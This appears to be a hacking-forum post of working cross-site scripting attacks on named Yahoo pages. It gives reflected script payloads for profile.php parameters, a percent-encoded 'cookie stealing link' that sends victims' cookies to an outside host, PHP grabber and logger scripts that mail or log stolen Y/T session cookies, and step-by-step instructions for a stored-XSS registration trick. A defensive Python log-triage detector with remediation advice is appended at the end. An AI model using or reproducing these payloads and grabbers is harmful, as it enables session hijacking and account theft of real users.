Code:
http://email.yahoosearchmarketing.com/acq/smx/pages/profile.php?
profile.php?
Code:
s=Y";><ScRipt>alert('testByKhalsa');</script>
Code:
o=INVALID";><ScRipt>alert('testByKhalsa');</script>
Code:
s3=";><ScRipt>alert('testByKhalsa');</script>
Code:
s2=";><ScRipt>alert('testByKhalsa');</script>
-----------------------------------------------------------------------------------------------------------
cookie stealing link :
Code:
http://tw.bbs.yahoo.com/cgi-bin/LocalSearch.cgi?board=&database=bid&keyword=&type=1&query='%3C%2F%53%43%52%49%50%54%3E%3C%53%43%52%49%50%54%3E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%68%6F%73%74%2E%63%6F%6D%2F%67%72%61%62%62%65%72%2E%70%68%70%3F%63%6F%6F%6B%69%65%3D%22%2B%65%73%63%61%70%65%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%53%43%52%49%50%54%3E
php grabber :
Code:
<?php
$cookie = $_GET[cookie];
$Y = explode('Y=', $cookie);
$Y = $Y[1];
$Y = explode(';', $Y);
$Y = $Y[0];
$T = explode('T=', $cookie);
$T = $T[1];
$T = explode(';', $T);
$T = $T[0];
$msg = "<html>Y=".$Y." <br>
<p>T=".$T."<br></html>";
$header = "Content-Type: text/html; charset=ISO-8859-4";
echo $msg;
mail('[email protected]', 'cookie', $msg, $header);
header('Location: http://www.google.ro');
?>
instructions:
Code:
Unescape the escaped chars in the stealing link and change the www.host.com to your host and then escape them back.
-------------------------------------------------------------------------------------
it goes like that:
you need to "register" yourself an "account" or something...
stupid thing but it works...
go to:
https://buzz.research.yahoo.com/dm/login/register.html
on "username" insert this code:
'><SCRIPT>location.href="http://www.yourhost.com/c.php?c="+escape(document.cookie)</SCRIPT>
this is the c.php:
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("m/d/Y g:i:s a");
$referer=getenv ('HTTP_REFERER');
$fl = fopen('log.txt', 'a');
fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");
fclose($fl);
?>
and make *.txt file:
log.txt
and now upload it to your server.
CHMOD: 777
now on yahoo..click on "I Agree/Register"
and you will get on the address bar something like that:
https://buzz.research.yahoo.com/dm/l...tml?eid=223322
now this is your cookie stealer..this link:
https://buzz.research.yahoo.com/dm/l...tml?eid=223322 (random number)
example:
https://buzz.research.yahoo.com/dm/l...er.html?eid=21
I'll appreciate good posts from you.
"thanks, good work" etc...
have a nice day. :-)
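Seen from the defending side, the requests described in this post share a few markers that survive percent-encoding and mixed-case tags. The following is an added example, not part of the original post: a small log-triage check that decodes query parameters and flags those markers. The function names, hosts and sample URLs are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Markers drawn from the payloads quoted in the post. Matching is
# case-insensitive because the tags there are written in mixed case.
MARKERS = {
    "script-tag": re.compile(r"<\s*/?\s*script\b", re.IGNORECASE),
    "cookie-read": re.compile(r"document\s*\.\s*cookie", re.IGNORECASE),
    "redirect": re.compile(r"location\s*\.\s*href\s*=", re.IGNORECASE),
}


def fully_decode(value, max_rounds=3):
    """Percent-decode until stable, so double-encoded input is normalised too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_url(url):
    """Map each suspicious query parameter to the sorted markers found in it."""
    findings = {}
    # Split on '&' by hand: the raw payloads contain ';' and quotes.
    for pair in urlsplit(url).query.split("&"):
        name, _, raw = pair.partition("=")
        value = fully_decode(raw)
        hits = sorted(m for m, rx in MARKERS.items() if rx.search(value))
        if hits:
            findings[name] = hits
    return findings


def pct_all(text):
    """Percent-encode every byte, the way the long link in the post is encoded."""
    return "".join("%%%02X" % b for b in text.encode())


# Constructed sample requests (placeholder hosts, not real log data).
SAMPLE_URLS = [
    "http://app.example.test/profile.php?s=Y\";><ScRipt>alert('t');</script>",
    "http://app.example.test/search.cgi?type=1&query=" + pct_all(
        "'</SCRIPT><SCRIPT>location.href=\"http://collector.example.test/?c=\""
        "+escape(document.cookie)</SCRIPT>"),
    "http://app.example.test/search.cgi?type=1&query=javascript+tutorial",
]

if __name__ == "__main__":
    for u in SAMPLE_URLS:
        print(inspect_url(u) or "clean", "<-", u[:60])
```

Pattern matching on request logs is a triage aid only. The server-side fix is context-aware output encoding of the reflected parameter, and marking session cookies HttpOnly keeps them out of `document.cookie`.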